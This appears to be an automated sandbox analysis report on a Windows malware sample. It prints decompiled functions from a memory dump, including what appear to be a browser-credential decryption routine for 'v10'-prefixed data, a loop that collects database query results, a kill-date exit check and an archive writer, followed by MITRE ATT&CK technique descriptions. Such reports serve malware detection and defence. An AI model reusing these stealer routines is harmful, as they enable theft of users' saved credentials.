Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CapsDevice$CreateReleasewsprintf
String ID: %dx%d
API String ID: 1281593598-2206825331
Opcode ID: 00c2a9e7bf0816d07782beb78801f7a69e3cffafc7fbedba4b567f41273c2773
Instruction ID: d5dc0e62f103973272cc37106ce1d60f9aa09adc193ea9ebfabfb2b31a0fc224
Opcode Fuzzy Hash: 00c2a9e7bf0816d07782beb78801f7a69e3cffafc7fbedba4b567f41273c2773
Instruction Fuzzy Hash: 68011DB5E55218AFE700DBA4DC4AFFEB778FB48701F00C5A9FA14A7290D67099058B94

Uniqueness

Uniqueness Score: -1.00%

Function 004082C0, Relevance: 9.1, APIs: 6, Instructions: 94
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E004082C0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				CHAR* _t27;
				void* _t30;
				void* _t32;
				void* _t38;
				intOrPtr _t44;
				intOrPtr _t58;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				E0040A270( &_v276, 0x104);
				_t27 =  *0x41707c; // 0xbb9490
				wsprintfA( &_v276, _t27, _a12, _a8);
				_t58 =  *0x417290; // 0xbae4d0
				_v280 = _t58;
				_t30 =  *0x417820(_a4,  &_v8);
				_t66 = _t64 + 0x18;
				if(_t30 == 0) {
					_t32 =  *0x4177d8(_v8, _v280, 0xffffffff,  &_v284, 0);
					_t67 = _t66 + 0x14;
					if(_t32 != 0) {
						L6:
						 *0x4177f8(_v284);
						return  *0x417824(_v8);
					}
					_v288 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t38 =  *0x4177f4(_v284);
						_t70 = _t67 + 4;
						if(_t38 != 0x64) {
							break;
						}
						_t44 =  *0x417810(_v284, 0);
						_t67 = _t70 + 8;
						_v292 = _t44;
						 *0x4179f8(_v288, _v292);
						 *0x4179f8(_v288, "\n");
					}
					E00412380(_a16,  &_v276, _v288,  *0x4178e4(_v288));
					_t67 = _t70 + 0x10;
					E0040A270( &_v288, 4);
					goto L6;
				}
				return _t30;
			}

0x004082d5
0x004082e2
0x004082ef
0x004082f8
0x004082fe
0x0040830c
0x00408312
0x00408317
0x00408333
0x00408339
0x0040833e
0x004083e9
0x004083f0
0x00000000
0x00408403
0x00408358
0x0040835e
0x00408365
0x0040836b
0x00408371
0x00000000
0x00000000
0x0040837c
0x00408382
0x00408385
0x00408399
0x004083ab
0x004083ab
0x004083d3
0x004083d8
0x004083e4
0x00000000
0x004083e4
0x00408409

APIs

wsprintfA.USER32 ref: 004082EF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040834B
RtlAllocateHeap.NTDLL(00000000), ref: 00408352
lstrcat.KERNEL32(?,?), ref: 00408399
lstrcat.KERNEL32(?,004165A0), ref: 004083AB
lstrlen.KERNEL32(?), ref: 004083BA

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: 17f5fc36ec9f27b146de00fbd150ea1196cab4365a5928f63e9d5611f16221d7
Instruction ID: 2fa2acd1e10c7cf9426eb5c395796af3bcda9966eba78decd255b64e0d78a52e
Opcode Fuzzy Hash: 17f5fc36ec9f27b146de00fbd150ea1196cab4365a5928f63e9d5611f16221d7
Instruction Fuzzy Hash: 8E31A6B190421CABCB14EFA4DC46FDA7778AB48700F0085E9F719E7281DA35DA51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405590, Relevance: 9.1, APIs: 6, Instructions: 75
timestringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00405590(void* __ecx, void* __eflags) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				char _v284;
				struct _SYSTEMTIME _v300;
				struct _SYSTEMTIME _v316;
				int _t45;
				char* _t52;
				intOrPtr _t57;
				void* _t66;

				E0040A270( &_v284, 0x104);
				_v300.wYear = 0;
				_v300.wMonth = 0;
				_v300.wDay = 0;
				_v300.wMinute = 0;
				_v300.wMilliseconds = 0;
				_v316.wYear = 0;
				_v316.wMonth = 0;
				_v316.wDay = 0;
				_v316.wMinute = 0;
				_v316.wMilliseconds = 0;
				_v20.dwLowDateTime = 0;
				_v20.dwHighDateTime = 0;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				GetSystemTime( &_v300);
				_t57 =  *0x4175fc; // 0xba3dd0
				 *0x4179f8( &_v284, _t57);
				_t52 =  *0x417104; // 0xba3c90
				sscanf( &_v284, _t52,  &(_v316.wDay),  &(_v316.wMonth),  &_v316,  &(_v316.wHour),  &(_v316.wMinute),  &(_v316.wSecond));
				SystemTimeToFileTime( &_v300,  &_v20);
				_t45 = SystemTimeToFileTime( &_v316,  &_v12);
				_t66 = _v20.dwHighDateTime - _v12.dwHighDateTime;
				if(_t66 >= 0 && (_t66 > 0 || _v20.dwLowDateTime > _v12.dwLowDateTime)) {
					ExitProcess(0);
				}
				return _t45;
			}

0x004055a5
0x004055ac
0x004055b5
0x004055bb
0x004055c1
0x004055c7
0x004055d0
0x004055d9
0x004055df
0x004055e5
0x004055eb
0x004055f2
0x004055fb
0x004055fe
0x00405607
0x00405611
0x00405617
0x00405625
0x00405655
0x00405663
0x00405677
0x00405688
0x00405691
0x00405694
0x004056a2
0x004056a2
0x004056ab

APIs

GetSystemTime.KERNEL32(?,?,00000104), ref: 00405611
lstrcat.KERNEL32(?,00BA3DD0), ref: 00405625
sscanf.NTDLL ref: 00405663
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00405677
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00405688
ExitProcess.KERNEL32 ref: 004056A2

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Time$System$File$ExitProcesslstrcatsscanf
String ID:
API String ID: 2797641603-0
Opcode ID: cd9ad3fd9ce57d77cf48be1efb9325a5c8ef25aaeaced2013aeb9dcf54f71605
Instruction ID: 453dd12944d1820cc931f1937b0655aa7537f41e9abb882bd679062d551944b9
Opcode Fuzzy Hash: cd9ad3fd9ce57d77cf48be1efb9325a5c8ef25aaeaced2013aeb9dcf54f71605
Instruction Fuzzy Hash: FA31D0B1D1461CABDB58DF94DC85ADEB7B9EF48300F0085EAE119A3250EB345B98CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004097F0() {
				struct _SYSTEMTIME _v20;
				void* _v24;

				_v24 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				GetLocalTime( &_v20);
				wsprintfA(_v24, "%d/%d/%d %d:%d:%d", _v20.wDay & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wYear & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				return _v24;
			}

0x0040980a
0x00409811
0x0040983e
0x0040984d

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0040483A,?,00000104), ref: 004097FD
RtlAllocateHeap.NTDLL(00000000), ref: 00409804
GetLocalTime.KERNEL32(?,?,?,?,?,?,0040483A,?,00000104), ref: 00409811
wsprintfA.USER32 ref: 0040983E

Strings

%d/%d/%d %d:%d:%d, xrefs: 00409835

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: %d/%d/%d %d:%d:%d
API String ID: 377395780-1073349071
Opcode ID: ffb282e5d7a8616694e978edd719b0814c8800292ffea192c81dbde65096e3d1
Instruction ID: 32934779aa47c3c077ac563d85309a556282239fb0b370acdafd2501a5a463f3
Opcode Fuzzy Hash: ffb282e5d7a8616694e978edd719b0814c8800292ffea192c81dbde65096e3d1
Instruction Fuzzy Hash: C4F06DB5808118BBCB10EBD5DD489FEB3B8AF08B02F00415ABA41A1180E6788640C775

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 104
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00405FF0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				long _v80;
				void* _v84;
				int _v88;
				char _v5092;
				void* _t58;
				void* _t94;

				E00412560(0x13e0, __ecx);
				if(_a8 < 3) {
					L10:
					return E00405F50(_a4, _a8);
				}
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				}
				if(((0 | _a12 != 0x00000000) & (0 | _a16 != 0x00000000)) == 0) {
					return 0x416b68;
				}
				memset( &_v76, 0, 0x40);
				_v76 = 0x40;
				_v72 = 1;
				_v68 = _a4 + 3;
				_v64 = 0xc;
				_v52 = _v68 + _a8 - 0x13;
				_v48 = 0x10;
				_v80 = _a8 - 3 - _v64 - _v48;
				_t58 = LocalAlloc(0x40, _v80);
				_v84 = _t58;
				if(_v84 == 0) {
					return _t58;
				}
				_v88 = 0;
				_v8 =  *0x417a2c(_a16, _v68 + _v64, _v80,  &_v76, 0, 0, _v84, _v80,  &_v88, 0);
				if(_v8 < 0) {
					return 0x416b68;
				}
				E0040A270( &_v5092, 0x1388);
				 *0x4179f8( &_v5092, _v84);
				 *((char*)(_t94 + _v88 - 0x13e0)) = 0;
				return  &_v5092;
			}

0x00405ff8
0x00406003
0x00406124
0x00000000
0x00406131
0x00406018
0x0040601a
0x00000000
0x00000000
0x00406034
0x00000000
0x0040611b
0x00406042
0x0040604a
0x00406051
0x0040605e
0x00406061
0x00406072
0x00406075
0x00406088
0x00406091
0x00406097
0x0040609e
0x00000000
0x00406119
0x004060a0
0x004060d2
0x004060d9
0x00000000
0x00406112
0x004060e7
0x004060f7
0x00406100
0x00000000

APIs

memset.MSVCRT ref: 00406042
LocalAlloc.KERNEL32(00000040,?), ref: 00406091
lstrcat.KERNEL32(?,00000000), ref: 004060F7

Strings

@, xrefs: 0040604A
v10, xrefs: 0040600E

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocLocallstrcatmemset
String ID: @$v10
API String ID: 4123878530-24753345
Opcode ID: bf037192f7a115cfc3970c417aa931cbc2c0ad176a69aa62bb25b0daa2b7f876
Instruction ID: 86fbee50aab9b4742beddacbab517bf93eb69210172b8ba5252c04bb29d40aff
Opcode Fuzzy Hash: bf037192f7a115cfc3970c417aa931cbc2c0ad176a69aa62bb25b0daa2b7f876
Instruction Fuzzy Hash: B3416DB1A04218EBDB14CFD8DC44BEEB7B4FB48344F00812AF506AB285D778AA55CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A110, Relevance: 7.6, APIs: 5, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040A110(void* __eflags, char* _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _t50;

				_t50 = __eflags;
				_v12 = MultiByteToWideChar(0, 0, _a4,  *0x4178e4(0), _a4, 0);
				_v16 = E0040A0E0( ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002,  ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002);
				_v8 = _v16;
				MultiByteToWideChar(0, 0, _a4,  *0x4178e4(_v12), _a4, _v8);
				 *((short*)(_v8 + _v12 * 2)) = 0;
				return _v8;
			}

0x0040a110
0x0040a133
0x0040a155
0x0040a15b
0x0040a179
0x0040a187
0x0040a191

APIs

lstrlen.KERNEL32(00000080,00000000,00000000,00000002,00000080,00000000), ref: 0040A11E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040A12D
new[].LIBCMTD ref: 0040A14D
lstrlen.KERNEL32(?,?,?), ref: 0040A16A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040A179

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWidelstrlen$new[]
String ID:
API String ID: 4156461339-0
Opcode ID: 64ea5233e2bb25aa02ad26619751da4f508682e4c293a1e0c53501c62bb98d5e
Instruction ID: 138c2ea6550639793c9b3b8c796600cbcb3a271f8a32bc17e15d2bfeae0cd536
Opcode Fuzzy Hash: 64ea5233e2bb25aa02ad26619751da4f508682e4c293a1e0c53501c62bb98d5e
Instruction Fuzzy Hash: D501DE75A44108BBDB44DFA8DD4AF9EBBB8AF4C300F108159B909D7290DA71AA00DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90, Relevance: 6.1, APIs: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C90(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				struct _SYSTEMTIME _v44;
				intOrPtr _v48;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t115;
				intOrPtr _t117;
				long _t130;
				intOrPtr _t131;
				intOrPtr _t132;

				_v48 = __ecx;
				 *(_v48 + 0x7c) = 0;
				 *(_v48 + 0x84) = 0;
				 *((char*)(_v48 + 0x80)) = 0;
				 *(_v48 + 0x78) = 0;
				 *(_v48 + 0x70) = 0;
				 *(_v48 + 0x90) = 0;
				 *(_v48 + 0x74) = 0;
				if(_a4 == 0 || _a4 == 0xffffffff) {
					return 0x10000;
				} else {
					_v8 = SetFilePointer( *(_v48 + 4), 0, 0, 1);
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v48 + 0x4c)) = 0x80000000;
						 *(_v48 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v48 + 0x70) = _a8;
						}
						 *((char*)(_v48 + 0x6c)) = 0;
						GetLocalTime( &_v44);
						SystemTimeToFileTime( &_v44,  &_v20);
						_t130 = _v20.dwLowDateTime;
						E00410210(_t130, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t88 = E004101D0(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t115 = _v48;
						 *((intOrPtr*)(_t115 + 0x50)) = _t88;
						 *(_t115 + 0x54) = _t130;
						_t131 = _v48;
						_t89 = _v48;
						 *((intOrPtr*)(_t131 + 0x58)) =  *((intOrPtr*)(_t89 + 0x50));
						 *((intOrPtr*)(_t131 + 0x5c)) =  *((intOrPtr*)(_t89 + 0x54));
						_t117 = _v48;
						_t132 = _v48;
						 *((intOrPtr*)(_t117 + 0x60)) =  *((intOrPtr*)(_t132 + 0x50));
						 *((intOrPtr*)(_t117 + 0x64)) =  *((intOrPtr*)(_t132 + 0x54));
						 *(_v48 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					_v12 = E004102C0(_a4, _v48 + 0x4c, _v48 + 0x70, _v48 + 0x50, _v48 + 0x68);
					if(_v12 == 0) {
						SetFilePointer(_a4, 0, 0, 0);
						 *((char*)(_v48 + 0x6c)) = 1;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					return _v12;
				}
			}

0x00410c96
0x00410c9c
0x00410ca6
0x00410cb3
0x00410cbd
0x00410cc7
0x00410cd1
0x00410cde
0x00410ce9
0x00000000
0x00410cfb
0x00410d0e
0x00410d15
0x00410d7f
0x00410d89
0x00410d94
0x00410d9c
0x00410d9c
0x00410da2
0x00410daa
0x00410db8
0x00410dca
0x00410dce
0x00410dde
0x00410de6
0x00410de9
0x00410dec
0x00410def
0x00410df2
0x00410df8
0x00410dfe
0x00410e01
0x00410e04
0x00410e0a
0x00410e10
0x00410e23
0x00410e2c
0x00000000
0x00410e2f
0x00410d3f
0x00410d46
0x00410d5a
0x00410d63
0x00410d6d
0x00000000
0x00410d70
0x00000000
0x00410d48

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,0041167E,?,?), ref: 00410D08
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0041167E), ref: 00410D5A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: de2165c068ae62b36e3b19c074c3b69a65d02ea23f571fe3693f3b6ca96ab9d4
Instruction ID: 2dee5916862957a1e54f687df175be53aa6008926f72c029a9c7b1fb51b83885
Opcode Fuzzy Hash: de2165c068ae62b36e3b19c074c3b69a65d02ea23f571fe3693f3b6ca96ab9d4
Instruction Fuzzy Hash: CA51C674A002099FDB04DFA8C484BDEBBF5BB4C304F14C65AE825AB391D775A985CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410950, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410950(intOrPtr __ecx, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;

				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0);
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						memcpy( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					E0040A100(_v20);
					_t148 = _t148 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				_t117 = _v28;
				if( *(_v28 + 0x3c) == 0) {
					_t102 = E0040A0E0(_t117, _a8 << 1);
					_t148 = _t148 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				memcpy( *(_v28 + 0x3c), _a4, _a8);
				_t148 = _t148 + 0xc;
				_v12 = 0;
				while(1) {
					_t155 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E00410040( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t155, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t148 = _t148 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}

0x00410956
0x0041095c
0x00410968
0x00410a32
0x00410a32
0x00410a35
0x00410a39
0x00410a8d
0x00410a90
0x00410a94
0x00410ab9
0x00410ac0
0x00000000
0x00410ac0
0x00410aab
0x00000000
0x00410ab1
0x00410a3b
0x00410a44
0x00410a47
0x00410a4a
0x00410a6f
0x00410a83
0x00000000
0x00410a86
0x00410a4f
0x00000000
0x00410a56
0x00410975
0x00410988
0x0041098f
0x00410994
0x0041099a
0x0041099a
0x004109a1
0x004109a8
0x004109b0
0x004109b5
0x004109b8
0x004109c1
0x004109ca
0x004109ca
0x004109dc
0x004109e1
0x004109e4
0x004109f6
0x004109f9
0x004109fc
0x00000000
0x00000000
0x00410a13
0x00410a18
0x00410a24
0x004109f3
0x004109f3
0x00410a2f
0x00000000

APIs

new[].LIBCMTD ref: 004109B0
memcpy.MSVCRT ref: 004109DC
memcpy.MSVCRT ref: 00410A6F

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: memcpy$new[]
String ID:
API String ID: 3541104900-0
Opcode ID: 5b880f40fa31087b08183abe438c657318f2eb890595dcc961cbd25bfb2fe010
Instruction ID: fb1e933cf9c541b5268f50c989270fd500e1857534469564858f123f59a7a3e9
Opcode Fuzzy Hash: 5b880f40fa31087b08183abe438c657318f2eb890595dcc961cbd25bfb2fe010
Instruction Fuzzy Hash: 1E51E8B4E00209DFCB44CF98C591AAEBBB2BF88314F108159E909AB346D774E9C1CF94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
